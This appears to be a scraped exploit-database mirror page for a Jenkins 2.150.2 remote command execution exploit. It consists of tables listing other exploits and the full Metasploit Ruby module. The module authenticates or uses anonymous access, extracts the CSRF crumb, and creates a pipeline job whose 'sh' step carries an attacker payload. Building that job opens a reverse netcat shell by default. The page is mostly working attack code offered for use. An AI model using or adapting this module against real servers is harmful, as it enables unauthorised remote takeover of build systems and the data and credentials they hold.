Menu

Improved exploit search engine. Try it out

"Jenkins 2.150.2 - Remote Command Execution (Metasploit)"

Author

AkkuS

Platform

linux

Release date

2019-02-12

Release Date Title Type Platform Author
2019-04-19 "SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)" local linux Metasploit
2019-04-12 "Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)" remote linux Metasploit
2019-04-08 "CentOS Web Panel 0.9.8.793 (Free) / 0.9.8.753 (Pro) - Cross-Site Scripting" webapps linux DKM
2019-04-08 "Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation" local linux cfreal
2019-03-29 "CentOS Web Panel 0.9.8.789 - NameServer Field Persistent Cross-Site Scripting" webapps linux DKM
2019-03-28 "gnutls 3.6.6 - 'verify_crt()' Use-After-Free" dos linux "Google Security Research"
2019-03-22 "snap - seccomp BBlacklist for TIOCSTI can be Circumvented" dos linux "Google Security Research"
2019-03-19 "libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons" dos linux "Google Security Research"
2019-03-11 "Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak" dos linux wally0813
2019-03-07 "Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)" remote linux Metasploit
2019-03-06 "Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem" dos linux "Google Security Research"
2019-03-04 "FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC)" dos linux "Mr Winst0n"
2019-03-01 "Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module" dos linux "Google Security Research"
2019-02-28 "Usermin 1.750 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-02-28 "WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service" dos linux "Dhiraj Mishra"
2019-02-22 "Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation" webapps linux SecureAuth
2019-02-20 "MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates" dos linux "Google Security Research"
2019-02-21 "Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)" dos linux "Alejandra Sánchez"
2019-02-13 "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)" local linux embargo
2019-02-15 "Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference" dos linux "Google Security Research"
2019-02-12 "Jenkins 2.150.2 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-02-11 "CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting" webapps linux DKM
2019-02-13 "snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)" local linux "Chris Moberly"
2019-02-13 "snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)" local linux "Chris Moberly"
2019-02-12 "runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution" local linux feexd
2019-02-11 "Evince - CBT File Command Injection (Metasploit)" local linux Metasploit
2018-10-20 "LibSSH 0.7.6 / 0.8.4 - Unauthorized Access" remote linux jas502n
2019-01-29 "MiniUPnPd 2.1 - Out-of-Bounds Read" dos linux b1ack0wl
2019-01-23 "Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation" webapps linux "Chris Lyne"
2019-01-24 "Ghostscript 9.26 - Pseudo-Operator Remote Code Execution" remote linux "Google Security Research"
Release Date Title Type Platform Author
2019-04-22 "ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-04-18 "ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)" remote windows AkkuS
2019-04-15 "CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)" remote php AkkuS
2019-04-12 "ATutor < 2.2.4 - 'file_manager' Remote Code Execution (Metasploit)" webapps php AkkuS
2019-04-03 "TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit)" remote php AkkuS
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
2019-03-11 "Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)" webapps multiple AkkuS
2019-03-07 "QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)" remote hardware AkkuS
2019-03-04 "Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)" webapps php AkkuS
2019-02-28 "Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)" webapps php AkkuS
2019-02-28 "Usermin 1.750 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-02-12 "Jenkins 2.150.2 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-01-24 "SirsiDynix e-Library 3.5.x - Cross-Site Scripting" webapps cgi AkkuS
2019-01-18 "Webmin 1.900 - Remote Command Execution (Metasploit)" remote cgi AkkuS
2019-01-10 "eBrigade ERP 4.5 - Arbitrary File Download" webapps php AkkuS
2019-01-02 "Vtiger CRM 7.1.0 - Remote Code Execution" webapps php AkkuS
2018-12-19 "Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)" webapps php AkkuS
2018-12-09 "i-doit CMDB 1.11.2 - Remote Code Execution" webapps php AkkuS
2018-12-04 "Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting" webapps php AkkuS
2018-12-03 "Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution" webapps php AkkuS
2018-11-21 "WebOfisi E-Ticaret V4 - 'urun' SQL Injection" webapps php AkkuS
2018-11-06 "OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection" webapps php AkkuS
2018-11-05 "PHP Proxy 3.0.3 - Local File Inclusion" webapps php AkkuS
2018-11-02 "qdPM 9.1 - 'filter_by' SQL Injection" webapps php AkkuS
2018-09-25 "Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection" webapps php AkkuS
2018-09-25 "Joomla Component eXtroForms 2.1.5 - 'filter_type_id' SQL Injection" webapps php AkkuS
2018-09-04 "PHP File Browser Script 1 - Directory Traversal" webapps php AkkuS
2018-09-04 "Logicspice FAQ Script 2.9.7 - Remote Code Execution" webapps php AkkuS
2018-09-03 "Online Quiz Maker 1.0 - 'catid' SQL Injection" webapps php AkkuS
2018-10-25 "ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution" webapps php AkkuS
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46352/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46352/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46352/40829/jenkins-21502-remote-command-execution-metasploit/download/", "exploit_id": "46352", "exploit_description": "\"Jenkins 2.150.2 -  Remote Command Execution (Metasploit)\"", "exploit_date": "2019-02-12", "exploit_author": "AkkuS", "exploit_type": "webapps", "exploit_platform": "linux", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Jenkins <= 2.150.2 Remote Command Execution via Node JS (Metasploit)',
          'Description'    => %q{
                  This module can run commands on the system using Jenkins users who has JOB creation and BUILD privileges.
                  The vulnerability is exploited by a small script prepared in NodeJS.
                  The sh parameter allows us to run commands.
                  Sample script: 
                                node {
                                      sh "whoami"
                                }
                  In addition, ANONYMOUS users also have the authority to JOB create and BUILD by default.
                  Therefore, all users without console authority can run commands on the system as root privilege.
          },
          'Author'         => [
            'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module
          ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              ['URL', 'https://pentest.com.tr/exploits/Jenkins-Remote-Command-Execution-via-Node-JS-Metasploit.html']
            ],
          'Privileged'     => true,
          'Payload'        =>
            {
              'DisableNops' => true,
              'Space'       => 512,
              'Compat'      =>
                {
                  'PayloadType' => 'cmd',
                  'RequiredCmd' => 'reverse netcat generic perl ruby python telnet',
                }
            },
          'Platform'       => 'unix',
          'Arch'           => ARCH_CMD,
          'Targets'        => [[ 'Jenkins <= 2.150.2', { }]],
          'DisclosureDate' => 'Feb 11 2019',
          'DefaultTarget'  => 0,
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }))

          register_options(
            [
                OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]),
                OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]),
                OptString.new('PATH', [ true, 'The path to jenkins', '/' ]),
            ], self.class)
    end
##
# Jenkins activity check
##
 
    def check
        res = send_request_cgi({'uri' => "/login"})
        if res and res.headers.include?('X-Jenkins')
            return Exploit::CheckCode::Detected
        else
            return Exploit::CheckCode::Safe
        end
    end
 
    def exploit
        print_status('Attempting to login to Jenkins dashboard')
        res = send_request_cgi({'uri' => "/script"})
        if not (res and res.code)
            fail_with(Exploit::Failure::Unknown)
        end
 
        sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
        @cookie = "#{sessionid}"
	print_status("#{sessionid}")
 
        if res.code != 200
            print_status('Logging in...')
##
# Access control and information
##
            res = send_request_cgi({
                'method'    => 'POST',
                'uri'       => "/j_acegi_security_check",
                'cookie'    => @cookie,
                'vars_post' =>
                    {
                        'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),
                        'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),
                        'Submit'     => 'Sign+in'
                    }
            })

            if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
                print_error('User Login failed. If anonymous login is active, exploit will continue.')
            end
        else
            print_status('No authentication required, skipping login...')
        end
##
# Check Crumb for create pipeline
##
	cookies = res.get_cookies
        res = send_request_cgi({
	    'method' => 'GET',
            'uri' => "/view/all/newJob",
            'cookie'  => cookies
        })

        html = res.body
        if html =~ /Jenkins-Crumb/
          print_good("Login Successful")
        else
          print_status("Service found, but login failed")
          exit 0
        end

	crumb = res.body.split('Jenkins-Crumb')[1].split('");<')[0].split('"').last
        print_status("Jenkins-Crumb: #{crumb}")
##
# Create Pipeline
##
        res = send_request_cgi({
	    'method' => 'POST',
            'uri' => "/view/all/createItem",
            'cookie'  => cookies,
            'vars_post' =>
                {
                    'name' => "cmd",
                    'mode' => "org.jenkinsci.plugins.workflow.job.WorkflowJob",
                    'from' => "",
                    'Jenkins-Crumb' => "#{crumb}",
                    'json' => "%7B%22name%22%3A+%22cmd%22%2C+%22mode%22%3A+%22org.jenkinsci.plugins.workflow.job.WorkflowJob%22%2C+%22from%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%22528f90f71b2d2742299b4daf503130ac%22%7"
                }
        })

##
# Configure Pipeline
##
        shell = payload.encoded
        res = send_request_cgi({
	    'method' => 'POST',
            'uri' => "/job/cmd/configSubmit",
            'cookie'  => cookies,
            'vars_post' =>
                {
                    'description' => "cmd",
                    'Jenkins-Crumb' => "#{crumb}",
                    'json' => "{\"description\": \"cmd\", \"properties\": {\"stapler-class-bag\": \"true\", \"hudson-security-AuthorizationMatrixProperty\": {}, \"jenkins-model-BuildDiscarderProperty\": {\"specified\": false, \"\": \"0\", \"strategy\": {\"daysToKeepStr\": \"\", \"numToKeepStr\": \"\", \"artifactDaysToKeepStr\": \"\", \"artifactNumToKeepStr\": \"\", \"stapler-class\": \"hudson.tasks.LogRotator\", \"$class\": \"hudson.tasks.LogRotator\"}}, \"org-jenkinsci-plugins-workflow-job-properties-DisableConcurrentBuildsJobProperty\": {\"specified\": false}, \"org-jenkinsci-plugins-workflow-job-properties-DisableResumeJobProperty\": {\"specified\": false}, \"com-coravy-hudson-plugins-github-GithubProjectProperty\": {}, \"org-jenkinsci-plugins-workflow-job-properties-DurabilityHintJobProperty\": {\"specified\": false, \"hint\": \"MAX_SURVIVABILITY\"}, \"org-jenkinsci-plugins-pipeline-modeldefinition-properties-PreserveStashesJobProperty\": {\"specified\": false, \"buildCount\": \"1\"}, \"hudson-model-ParametersDefinitionProperty\": {\"specified\": false}, \"jenkins-branch-RateLimitBranchProperty$JobPropertyImpl\": {}, \"org-jenkinsci-plugins-workflow-job-properties-PipelineTriggersJobProperty\": {\"triggers\": {\"stapler-class-bag\": \"true\"}}}, \"disable\": false, \"hasCustomQuietPeriod\": false, \"quiet_period\": \"5\", \"displayNameOrNull\": \"\", \"\": \"0\", \"definition\": {\"script\": \"node {\\n    sh \\\"#{shell}\\\"\\n}\", \"\": [\"try sample Pipeline...\", \"\\u0001\\u0001\"], \"sandbox\": true, \"stapler-class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\", \"$class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\"}, \"core:apply\": \"\", \"Jenkins-Crumb\": \"#{crumb}\"}",
                    'Submit' => "Save"
                }
        })

        if res.code == 302
          print_good("Pipeline was created and Node JS code was integrated.")
        end
##
# Build Pipeline and Execute payload
##
        print_status("Trying to get remote shell...")
        res = send_request_cgi({
	    'method' => 'POST',
            'uri' => "/job/cmd/build?delay=0sec",
            'cookie'  => cookies,
            'vars_post' =>
                {
                    'Jenkins-Crumb' => "#{crumb}"
                }
        })
    handler
    end
end
##
# End
##